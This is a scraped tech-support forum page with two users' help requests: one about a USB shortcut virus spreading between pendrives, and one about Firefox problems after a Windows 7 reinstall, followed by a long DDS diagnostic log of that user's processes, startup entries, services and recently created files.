Hii Everyone,

I have a problem in my laptop, whenever I insert a pendrive in my lappy it creates a shortcut of that USB and the files don't open.
If I open the shortcut and then put my file in it , the file opens, It is affecting my lappy as well as other's. Some of my friends laptop has got affected because of this issue and some pendrive have stopped working. It gets write protected and also got .dll error.
Please suggest me something as soon as possible. I would be greatful to you people.

Hi,

I really don't think I have malware; however, from my thread some glitches after restored win7 http://www.techsupportforum.com/foru...7-1014026.html spunk.funk thinks it may be malware.

Right now the biggest problem is with FF, making the tabs the same when I try to open a new one or change one, clicking on links in email or forum doesn't work and loss of icon on taskbar in general account only. I've uninstalled and reinstalled FF 4 times since the reinstall of the OS (the first one I had a BSOD in the middle of updating windows and had many, many problems, so did a full reinstall - and ran anti-malware programs both before and after the reinstalls (MSSE, Malwarebytes, and ESET online scanner) and none found any problems. I didn't load the 3 PUPs windows updates when updating windows, although before the reinstall and before I knew the windows7 updates were PUP's for win10 I had them downloaded and installed.

One other program isn't showing up on in my general account. Also, a few desktop icons I can't seem to get rid of that have to do with my cannon printer.

Since the BSOD in the first try to reinstall had to do with hardware, I've loaded the drivers for my other USB hardware but removed them, so only my mouse and keyboard are plugged in.

I have the factory disc (which I used for the reinstalls) and the windows disc for my computer.

Thank you

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17840
Run by 93 at 14:16:49 on 2015-07-05
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.7104.5233 [GMT -7:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
SP: Microsoft Security Essentials *Enabled/Updated* {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Program Files\Sandboxie\SbieSvc.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\ASUS\AXSP\1.01.01\atkexComSvc.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Windows\System32\svchost.exe -k utcsvc
C:\Program Files\Intel\iCLS Client\HeciServer.exe
C:\Program Files\Microsoft LifeCam\MSCamS64.exe
C:\Windows\system32\svchost.exe -k imgsvc
c:\Program Files\Microsoft Security Client\NisSrv.exe
C:\Windows\System32\WUDFHost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskhost.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskeng.exe
c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe
c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe
C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\system32\igfxsrvc.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Users\93\AppData\Local\FluxSoftware\Flux\flux.exe
C:\Program Files\Sandboxie\SbieCtrl.exe
C:\Program Files (x86)\Ruiware\WinPatrol\WinPatrol.exe
C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Windows\splwow64.exe
C:\Program Files (x86)\Canon\Quick Menu\CNQMUPDT.EXE
C:\Program Files (x86)\Canon\Quick Menu\CNQMSWCS.exe
C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\PrintIsolationHost.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.pugetsystems.com/welcome.php?oid=117561
mWinlogon: Userinit = userinit.exe
BHO: Canon Easy-WebPrint EX BHO: {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
TB: Canon Easy-WebPrint EX: {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll
EB: Canon Easy-WebPrint EX: {21347690-EC41-4F9A-8887-1F4AEE672439} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll
uRun: [f.lux] "C:\Users\93\AppData\Local\FluxSoftware\Flux\flux.exe" /noshow
uRun: [SandboxieControl] "C:\Program Files\Sandboxie\SbieCtrl.exe"
uRun: [WinPatrol] C:\Program Files (x86)\Ruiware\WinPatrol\winpatrol.exe -expressboot
mRun: [USB3MON] "C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe"
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [LifeCam] "C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe"
mRun: [CanonQuickMenu] C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE /logon
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:0
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: PromptOnSecureDesktop = dword:0
IE: Add to Google Photos Screensa&ver - C:\Windows\System32\GPhotos.scr/200
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~3\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\PROGRA~2\MICROS~3\Office14\ONBttnIE.dll/105
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
.
INFO: HKCU has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
TCP: NameServer = 192.168.0.1 205.171.3.25
TCP: Interfaces\{649FED28-E5CC-41A3-A3E0-B1852BA10A06} : DHCPNameServer = 192.168.0.1 205.171.3.25
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\43.0.2357.130\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-BHO: Canon Easy-WebPrint EX BHO: {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL
x64-TB: Canon Easy-WebPrint EX: {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll
x64-Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe -s
x64-Run: [IAStorIcon] "C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIconLaunch.exe" "C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe" 60
x64-Run: [IgfxTray] "C:\Windows\System32\igfxtray.exe"
x64-Run: [HotKeysCmds] "C:\Windows\System32\hkcmd.exe"
x64-Run: [Persistence] "C:\Windows\System32\igfxpers.exe"
x64-Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-Notify: igfxcui - igfxdev.dll
x64-SSODL: WebCheck - <orphaned>
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\93\AppData\Roaming\Mozilla\Firefox\Profiles\syowip1a.default\
FF - prefs.js: browser.startup.homepage - hxxp://www.pugetsystems.com/welcome.php?oid=117561
FF - plugin: C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL
FF - plugin: C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL
FF - plugin: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll
FF - plugin: C:\Program Files (x86)\Canon\MyCamera Download Plugin\NPCIG.dll
FF - plugin: C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll
FF - plugin: C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll
FF - plugin: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrlui.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_194.dll
.
============= SERVICES / DRIVERS ===============
.
R0 iaStorA;iaStorA;C:\Windows\System32\drivers\iaStorA.sys [2013-1-31 652784]
R0 iaStorF;iaStorF;C:\Windows\System32\drivers\iaStorF.sys [2013-1-31 28656]
R0 iusb3hcs;Intel(R) USB 3.0 Host Controller Switch Driver;C:\Windows\System32\drivers\iusb3hcs.sys [2013-11-21 20464]
R0 MpFilter;Microsoft Malware Protection Driver;C:\Windows\System32\drivers\MpFilter.sys [2015-3-4 280376]
R2 Apple Mobile Device Service;Apple Mobile Device Service;C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [2015-5-29 77128]
R2 asComSvc;ASUS Com Service;C:\Program Files (x86)\ASUS\AXSP\1.01.01\atkexComSvc.exe [2013-11-21 927232]
R2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2014-4-11 103608]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2014-4-11 124088]
R2 DiagTrack;Diagnostics Tracking Service;C:\Windows\System32\svchost.exe -k utcsvc [2009-7-13 27136]
R2 IAStorDataMgrSvc;Intel(R) Rapid Storage Technology;C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [2013-1-31 15344]
R2 Intel(R) Capability Licensing Service Interface;Intel(R) Capability Licensing Service Interface;C:\Program Files\Intel\iCLS Client\HeciServer.exe [2013-2-13 731648]
R2 jhi_service;Intel(R) Dynamic Application Loader Host Interface Service;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe [2013-11-21 169432]
R2 NisDrv;Microsoft Network Inspection System;C:\Windows\System32\drivers\NisDrvWFP.sys [2013-6-18 124568]
R3 e1dexpress;Intel(R) PRO/1000 PCI Express Network Connection Driver D;C:\Windows\System32\drivers\e1d62x64.sys [2013-11-21 496400]
R3 IntcDAud;Intel(R) Display Audio;C:\Windows\System32\drivers\IntcDAud.sys [2013-11-21 452088]
R3 iusb3hub;Intel(R) USB 3.0 Hub Driver;C:\Windows\System32\drivers\iusb3hub.sys [2013-11-21 368112]
R3 iusb3xhc;Intel(R) USB 3.0 eXtensible Host Controller Driver;C:\Windows\System32\drivers\iusb3xhc.sys [2013-11-21 786416]
R3 MBAMProtector;MBAMProtector;C:\Windows\System32\drivers\mbam.sys [2013-11-21 25816]
R3 NisSrv;Microsoft Network Inspection;C:\Program Files\Microsoft Security Client\NisSrv.exe [2015-4-30 366544]
R3 SbieDrv;SbieDrv;C:\Program Files\Sandboxie\SbieDrv.sys [2015-6-23 190088]
S2 MBAMService;MBAMService;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [2015-7-4 1133880]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2015-6-3 327296]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\Windows\System32\ieetwcollector.exe [2015-7-4 114688]
S3 Intel(R) Capability Licensing Service TCP IP Interface;Intel(R) Capability Licensing Service TCP IP Interface;C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [2013-2-13 820184]
S3 MBAMWebAccessControl;MBAMWebAccessControl;C:\Windows\System32\drivers\mwac.sys [2015-7-4 63704]
S3 MSHUSBVideo;NX6000/NX3000/VX2000/VX5000/VX5500/VX7000/Cinema Filter Driver;C:\Windows\System32\drivers\nx6000.sys [2010-5-20 36720]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;C:\Windows\System32\drivers\rdpvideominiport.sys [2013-11-21 19456]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2015-7-5 56832]
S3 TsUsbGD;Remote Desktop Generic USB Device;C:\Windows\System32\drivers\TsUsbGD.sys [2013-11-21 30208]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2013-11-21 1255736]
.
=============== Created Last 30 ================
.
2015-07-05 21:05:39 75888 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B8CDF2AE-9704-4AC7-A361-33BB8383E557}\offreg.936.dll
2015-07-05 14:58:35 -------- d-----r- C:\Sandbox
2015-07-05 14:53:41 12221144 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{B8CDF2AE-9704-4AC7-A361-33BB8383E557}\mpengine.dll
2015-07-05 13:55:51 12221144 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2015-07-05 13:11:54 -------- d-----w- C:\Program Files (x86)\ESET
2015-07-05 13:08:09 -------- d-----w- C:\Windows\pss
2015-07-05 12:53:06 -------- d-----w- C:\Users\93\AppData\Roaming\WinPatrol
2015-07-05 12:53:01 -------- d-----w- C:\ProgramData\InstallMate
2015-07-05 12:53:01 -------- d-----w- C:\Program Files (x86)\Ruiware
2015-07-05 12:47:28 -------- d-----w- C:\Program Files\iTunes
2015-07-05 12:47:28 -------- d-----w- C:\Program Files\iPod
2015-07-05 12:47:28 -------- d-----w- C:\Program Files (x86)\iTunes
2015-07-05 12:33:13 159744 ----a-w- C:\Program Files\Internet Explorer\Plugins\npqtplugin5.dll
2015-07-05 12:33:13 159744 ----a-w- C:\Program Files\Internet Explorer\Plugins\npqtplugin4.dll
2015-07-05 12:33:13 159744 ----a-w- C:\Program Files\Internet Explorer\Plugins\npqtplugin3.dll
2015-07-05 12:33:13 159744 ----a-w- C:\Program Files\Internet Explorer\Plugins\npqtplugin2.dll
2015-07-05 12:33:13 159744 ----a-w- C:\Program Files\Internet Explorer\Plugins\npqtplugin.dll
2015-07-05 12:20:59 -------- d-----w- C:\Users\93\AppData\Local\Macromedia
2015-07-05 12:19:17 -------- d-----w- C:\Users\93\AppData\Roaming\Canneverbe Limited
2015-07-05 12:09:38 778416 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2015-07-05 12:09:38 142512 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2015-07-05 12:01:58 336896 ----a-w- C:\Windows\SysWow64\CNC_C9L.dll
2015-07-05 12:01:58 15872 ----a-w- C:\Windows\SysWow64\CNHMCA.dll
2015-07-05 11:59:58 -------- d-----w- C:\ProgramData\CanonIJWSpt
2015-07-05 11:56:22 -------- d-----w- C:\Program Files\Canon
2015-07-05 11:55:41 30208 ----a-w- C:\Windows\System32\Spool\prtprocs\x64\CNMPDC9.DLL
2015-07-05 11:55:41 102912 ----a-w- C:\Windows\System32\Spool\prtprocs\x64\CNMPPC9.DLL
2015-07-05 11:55:39 369664 ----a-w- C:\Windows\System32\CNC_C9L.dll
2015-07-05 11:55:39 316928 ----a-w- C:\Windows\System32\CNC_C9C.dll
2015-07-05 11:55:39 17920 ----a-w- C:\Windows\System32\CNHMCA6.dll
2015-07-05 11:55:39 105984 ----a-w- C:\Windows\System32\CNC_C9I.dll
2015-07-05 11:55:35 406016 ----a-w- C:\Windows\System32\CNMLMC9.DLL
2015-07-05 11:30:34 -------- d-----w- C:\Users\93\AppData\Roaming\Canon_Inc_IC
2015-07-05 11:30:00 -------- d-----w- C:\Program Files (x86)\Canon
2015-07-05 11:29:57 -------- d-----w- C:\Program Files (x86)\Common Files\Canon_Inc_IC
2015-07-05 11:28:38 -------- d-----w- C:\ProgramData\Canon_Inc_IC
2015-07-05 11:23:42 -------- d-----w- C:\Temp
2015-07-05 08:46:41 6584320 ----a-w- C:\Windows\System32\mstscax.dll
2015-07-05 08:45:58 2565120 ----a-w- C:\Windows\System32\d3d10warp.dll
2015-07-05 08:45:58 1987584 ----a-w- C:\Windows\SysWow64\d3d10warp.dll
2015-07-05 08:45:57 3179520 ----a-w- C:\Windows\System32\rdpcorets.dll
2015-07-05 08:45:57 243200 ----a-w- C:\Windows\System32\rdpudd.dll
2015-07-05 08:45:57 16384 ----a-w- C:\Windows\System32\RdpGroupPolicyExtension.dll
2015-07-05 08:45:42 460800 ----a-w- C:\Windows\System32\certcli.dll
2015-07-05 08:45:42 342016 ----a-w- C:\Windows\SysWow64\certcli.dll
2015-07-05 08:45:22 1647104 ----a-w- C:\Windows\System32\DWrite.dll
2015-07-05 08:45:22 1250816 ----a-w- C:\Windows\SysWow64\DWrite.dll
2015-07-05 08:45:22 1179136 ----a-w- C:\Windows\System32\FntCache.dll
2015-07-05 08:45:17 683520 ----a-w- C:\Windows\System32\termsrv.dll
2015-07-05 08:43:02 52224 ----a-w- C:\Windows\SysWow64\nlaapi.dll
2015-07-05 08:43:02 303616 ----a-w- C:\Windows\System32\nlasvc.dll
2015-07-05 08:43:02 156672 ----a-w- C:\Windows\SysWow64\ncsi.dll
2015-07-05 08:43:00 335360 ----a-w- C:\Windows\System32\msieftp.dll
2015-07-05 08:43:00 301568 ----a-w- C:\Windows\SysWow64\msieftp.dll
2015-07-05 08:42:58 210432 ----a-w- C:\Windows\System32\profsvc.dll
2015-07-05 08:42:56 484864 ----a-w- C:\Windows\System32\wer.dll
2015-07-05 08:42:56 381440 ----a-w- C:\Windows\SysWow64\wer.dll
2015-07-05 08:42:54 141312 ----a-w- C:\Windows\System32\drivers\mrxdav.sys
2015-07-05 08:27:44 -------- d-s---w- C:\Windows\SysWow64\GWX
2015-07-05 08:27:44 -------- d-s---w- C:\Windows\System32\GWX
2015-07-05 08:27:44 -------- d-----w- C:\Windows\Migration
2015-07-05 08:17:05 2777088 ----a-w- C:\Windows\System32\msmpeg2vdec.dll
2015-07-05 08:17:05 2285056 ----a-w- C:\Windows\SysWow64\msmpeg2vdec.dll
2015-07-05 07:35:58 81408 ----a-w- C:\Windows\System32\imagehlp.dll
2015-07-05 07:35:58 159232 ----a-w- C:\Windows\SysWow64\imagehlp.dll
2015-07-05 07:35:56 504320 ----a-w- C:\Windows\System32\msihnd.dll
2015-07-05 07:35:56 337408 ----a-w- C:\Windows\SysWow64\msihnd.dll
2015-07-05 07:35:56 1941504 ----a-w- C:\Windows\System32\authui.dll
2015-07-05 07:35:56 1805824 ----a-w- C:\Windows\SysWow64\authui.dll
2015-07-05 07:35:56 112064 ----a-w- C:\Windows\System32\consent.exe
2015-07-05 07:35:45 497152 ----a-w- C:\Windows\System32\drivers\afd.sys
2015-07-05 07:35:44 624128 ----a-w- C:\Windows\System32\qedit.dll
2015-07-05 07:35:44 509440 ----a-w- C:\Windows\SysWow64\qedit.dll
2015-07-05 07:12:31 -------- d-----w- C:\Program Files\Sandboxie
2015-07-05 07:09:35 -------- d-----w- C:\Users\93\AppData\Local\FluxSoftware
2015-07-05 06:52:17 124112 ----a-w- C:\Windows\System32\PresentationCFFRasterizerNative_v0300.dll
2015-07-05 06:52:17 102608 ----a-w- C:\Windows\SysWow64\PresentationCFFRasterizerNative_v0300.dll
2015-07-05 06:39:09 230400 ----a-w- C:\Windows\System32\drivers\portcls.sys
2015-07-05 06:39:09 116736 ----a-w- C:\Windows\System32\drivers\drmk.sys
2015-07-05 06:39:04 99840 ----a-w- C:\Windows\System32\drivers\usbccgp.sys
2015-07-05 06:39:04 7808 ----a-w- C:\Windows\System32\drivers\usbd.sys
2015-07-05 06:39:04 53248 ----a-w- C:\Windows\System32\drivers\usbehci.sys
2015-07-05 06:39:04 343040 ----a-w- C:\Windows\System32\drivers\usbhub.sys
2015-07-05 06:39:04 325120 ----a-w- C:\Windows\System32\drivers\usbport.sys
2015-07-05 06:39:04 30720 ----a-w- C:\Windows\System32\drivers\usbuhci.sys
2015-07-05 06:39:04 25600 ----a-w- C:\Windows\System32\drivers\usbohci.sys
2015-07-05 06:38:46 -------- d-----w- C:\Users\93\AppData\Roaming\Contaware
2015-07-05 06:38:46 -------- d-----w- C:\ContaCam
2015-07-05 06:38:39 -------- d-----w- C:\Program Files (x86)\ContaCam
2015-07-05 06:36:02 -------- d-----w- C:\ProgramData\Licenses
2015-07-05 06:36:01 129872 ----a-w- C:\Windows\SysWow64\MSSTDFMT.DLL
2015-07-05 06:35:59 -------- d-----w- C:\Program Files (x86)\SpywareBlaster
2015-07-05 06:28:45 -------- d-----w- C:\Users\93\AppData\Local\Skype
2015-07-05 06:27:01 -------- d-----w- C:\Program Files\Microsoft LifeCam
2015-07-05 06:27:01 -------- d-----w- C:\Program Files (x86)\Microsoft LifeCam
2015-07-05 06:08:24 -------- d-----w- C:\Program Files\Microsoft Mouse and Keyboard Center
2015-07-05 06:03:46 878080 ----a-w- C:\Windows\System32\IMJP10K.DLL
2015-07-05 06:03:46 701440 ----a-w- C:\Windows\SysWow64\IMJP10K.DLL
2015-07-05 06:03:45 3928064 ----a-w- C:\Windows\System32\d2d1.dll
2015-07-05 06:03:45 3419136 ----a-w- C:\Windows\SysWow64\d2d1.dll
2015-07-05 06:03:44 2048 ----a-w- C:\Windows\SysWow64\msxml3r.dll
2015-07-05 06:03:44 2048 ----a-w- C:\Windows\System32\msxml3r.dll
2015-07-05 06:03:44 1882624 ----a-w- C:\Windows\System32\msxml3.dll
2015-07-05 06:03:44 1237504 ----a-w- C:\Windows\SysWow64\msxml3.dll
2015-07-05 06:03:41 985536 ----a-w- C:\Windows\System32\drivers\dxgkrnl.sys
2015-07-05 06:00:13 459336 ----a-w- C:\Windows\System32\drivers\cng.sys
2015-07-05 05:59:21 3206144 ----a-w- C:\Windows\System32\win32k.sys
2015-07-05 05:51:44 861696 ----a-w- C:\Windows\System32\oleaut32.dll
2015-07-05 05:51:44 571904 ----a-w- C:\Windows\SysWow64\oleaut32.dll
2015-07-05 05:51:40 142336 ----a-w- C:\Windows\System32\poqexec.exe
2015-07-05 05:51:40 123904 ----a-w- C:\Windows\SysWow64\poqexec.exe
2015-07-05 05:49:08 241152 ----a-w- C:\Windows\System32\pku2u.dll
2015-07-05 05:49:08 186880 ----a-w- C:\Windows\SysWow64\pku2u.dll
2015-07-05 05:46:48 828928 ----a-w- C:\Windows\SysWow64\msctf.dll
2015-07-05 05:45:53 72192 ----a-w- C:\Windows\System32\aelupsvc.dll
2015-07-05 05:44:57 1684928 ----a-w- C:\Windows\System32\drivers\ntfs.sys
2015-07-05 05:44:55 406528 ----a-w- C:\Windows\System32\scesrv.dll
2015-07-05 05:44:55 308224 ----a-w- C:\Windows\SysWow64\scesrv.dll
2015-07-05 05:44:53 3241984 ----a-w- C:\Windows\System32\msi.dll
2015-07-05 05:44:53 2363904 ----a-w- C:\Windows\SysWow64\msi.dll
2015-07-05 05:44:35 202752 ----a-w- C:\Windows\System32\scrrun.dll
2015-07-05 05:44:35 168960 ----a-w- C:\Windows\System32\wscript.exe
2015-07-05 05:44:35 163840 ----a-w- C:\Windows\SysWow64\scrrun.dll
2015-07-05 05:44:35 156160 ----a-w- C:\Windows\System32\cscript.exe
2015-07-05 05:44:35 150016 ----a-w- C:\Windows\System32\wshom.ocx
2015-07-05 05:44:35 141824 ----a-w- C:\Windows\SysWow64\wscript.exe
2015-07-05 05:44:35 126976 ----a-w- C:\Windows\SysWow64\cscript.exe
2015-07-05 05:44:35 121856 ----a-w- C:\Windows\SysWow64\wshom.ocx
2015-07-05 05:43:02 465920 ----a-w- C:\Windows\System32\WMPhoto.dll
2015-07-05 05:43:02 417792 ----a-w- C:\Windows\SysWow64\WMPhoto.dll
2015-07-05 05:43:01 664064 ----a-w- C:\Windows\SysWow64\rpcrt4.dll
2015-07-05 05:43:01 1216000 ----a-w- C:\Windows\System32\rpcrt4.dll
2015-07-05 05:21:55 -------- d-----w- C:\Windows\TempF557102D-152E-62A5-F388-7DC92BE60855-Signatures
2015-07-05 05:15:25 -------- d-----r- C:\Program Files (x86)\Skype
2015-07-05 05:11:12 99480 ----a-w- C:\Windows\SysWow64\infocardapi.dll
2015-07-05 05:11:11 8856 ----a-w- C:\Windows\SysWow64\icardres.dll
2015-07-05 05:11:11 8856 ----a-w- C:\Windows\System32\icardres.dll
2015-07-05 05:11:11 619672 ----a-w- C:\Windows\SysWow64\icardagt.exe
2015-07-05 05:11:11 171160 ----a-w- C:\Windows\System32\infocardapi.dll
2015-07-05 05:11:11 1389208 ----a-w- C:\Windows\System32\icardagt.exe
2015-07-05 05:10:59 35480 ----a-w- C:\Windows\SysWow64\TsWpfWrp.exe
2015-07-05 05:10:59 35480 ----a-w- C:\Windows\System32\TsWpfWrp.exe
2015-07-05 04:50:35 1480192 ----a-w- C:\Windows\System32\crypt32.dll
2015-07-05 04:30:30 493504 ----a-w- C:\Windows\System32\mcupdate_GenuineIntel.dll
2015-07-05 04:26:21 81560 ----a-w- C:\Windows\SysWow64\mscories.dll
2015-07-05 04:26:21 73880 ----a-w- C:\Windows\System32\mscories.dll
2015-07-05 04:26:21 1943696 ----a-w- C:\Windows\System32\dfshim.dll
2015-07-05 04:26:21 156824 ----a-w- C:\Windows\SysWow64\mscorier.dll
2015-07-05 04:26:21 156312 ----a-w- C:\Windows\System32\mscorier.dll
2015-07-05 04:26:21 1131664 ----a-w- C:\Windows\SysWow64\dfshim.dll
2015-07-05 04:24:57 82944 ----a-w- C:\Windows\System32\dwmapi.dll
2015-07-05 04:24:57 67584 ----a-w- C:\Windows\SysWow64\dwmapi.dll
2015-07-05 04:24:57 1632768 ----a-w- C:\Windows\System32\dwmcore.dll
2015-07-05 04:24:57 1372160 ----a-w- C:\Windows\SysWow64\dwmcore.dll
2015-07-05 04:18:08 965000 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\NISBackup\gapaengine.dll
2015-07-05 04:18:08 1190000 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{A3917C19-9C92-466A-9D63-AE4A0B6E4827}\gapaengine.dll
2015-07-05 04:09:59 -------- d-----w- C:\Windows\PCHEALTH
2015-07-05 04:06:53 -------- d-----w- C:\Program Files (x86)\Microsoft Analysis Services
2015-07-05 04:06:41 -------- d-----w- C:\Users\93\AppData\Local\Microsoft Help
2015-06-17 07:23:50 94208 ----a-w- C:\Windows\SysWow64\QuickTimeVR.qtx
2015-06-17 07:23:50 69632 ----a-w- C:\Windows\SysWow64\QuickTime.qts
.
==================== Find3M ====================
.
2015-07-05 10:08:23 300704 ------w- C:\Windows\System32\MpSigStub.exe
